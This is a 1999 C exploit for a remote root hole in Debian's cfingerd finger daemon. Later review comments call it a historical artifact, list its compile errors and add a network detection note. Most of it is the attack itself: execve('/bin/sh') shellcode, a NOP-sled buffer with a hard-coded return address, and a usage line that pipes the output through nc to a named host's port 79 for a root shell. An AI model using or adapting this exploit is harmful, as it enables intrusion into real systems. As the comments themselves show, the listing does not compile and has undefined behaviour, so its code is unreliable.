- /*
- - Imperfection Security Presents -
-
- Debian GNU/Linux cfingerd remote root exploit
- From shakey, of Imperfection Security [07/99]
-
- Exploits a problem reported on BUGTRAQ in Debian's
- cfingerd. This exploit is remotely exploitable, and
- leaves the attacker a root shell on vulnerable systems.
- However, this attack is less susceptible to mass-probing
- from script kiddies due to the lack of a banner from the
- finger service ;D
-
- Affected Systems:
- + Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2
-
- Greetings: dave, unknown, syntax, naptime, jaz, blitzed
- t0m, insane, DSC, short, vicci, crime, SDI
- ( nice shellcode generator ), phewl,
- phenom, punish, kindred, tom-, justin
-
- Usage:
- IS-finger [offset]
- Example: (./IS-finger 0; cat) | nc linux.org 79
- */
-
- #include <stdio.h>
-
- /* Payload bytes copied verbatim from the page: raw machine code ending in
-    the literal string "/bin/sh". Kept as a historical artifact only.
-    NOTE(review): the declaration has no terminating ';' after the last
-    string literal, so the listing does not compile as shown. */
- char shellcode[] =
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
- "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
- "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
- "\xff\xff/bin/sh"
-
- /*
-  * Builds the finger request used by this 1999 proof of concept and writes
-  * it to stdout; the usage line in the header pipes that output into nc.
-  * Preserved here as a historical artifact for the Debian releases listed
-  * above. As shown the listing does not compile: `host` (used below) is
-  * never declared, main has an implicit int return type, and exit, atoi,
-  * strlen and sleep are used without their headers.
-  *
-  * Detection note: the request is a long run of 0x90 bytes followed by the
-  * shellcode string and a CRLF on port 79, a straightforward pattern to
-  * match in network monitoring or finger-daemon logs.
-  */
- main (int argc, char *argv[]) {
- char buf[2500];
- int x,y=1000, offset=0;
- long addr;
- int bsize=986;
-
- /* NOTE(review): any argument triggers the usage text and exit, while the
-    next check reads argv[1] when argc == 1 - argv[1] is NULL there, so
-    atoi would dereference a null pointer (undefined behaviour). Left as on
-    the page. */
- if ( argc > 1) {
- printf ( "Imperfection Securities\' cfingerd exploit.");
- printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
- exit (0);
- }
-
- if ( argc > 0) offset = atoi (argv[1]);
-
- /* Hard-coded 32-bit stack address plus the user-supplied offset; specific
-    to the x86 Debian builds named in the header. */
- addr = 0xbffff3c0 + offset;
-
- /* `host` is not declared anywhere in this listing. */
- bsize -= strlen ( host);
-
- /* Fill the front of the buffer with 0x90 bytes. */
- for ( x = 0; x < bsize-strlen(shellcode); x++)
- buf[x] = 0x90;
-
- /* Copy the shellcode bytes in directly after the fill. */
- for ( y = 0; y < strlen(shellcode); x++, y++)
- buf[x] = shellcode[y];
-
- /* Write addr as 4 little-endian bytes per iteration. */
- for ( ; x < 72; x+=4) {
- buf[x ] = addr & 0x000000ff;
- buf[x+1] = (addr & 0x0000ff00) >> 8;
- buf[x+2] = (addr & 0x00ff0000) >> 16;
- buf[x+3] = (addr & 0xff000000) >> 24;
- }
-
- /* NOTE(review): buf is never NUL-terminated, so "%s" reads past the bytes
-    written above (undefined behaviour in C). */
- sleep (1);
- printf ( "%s\r\n", buf);
- }
-
-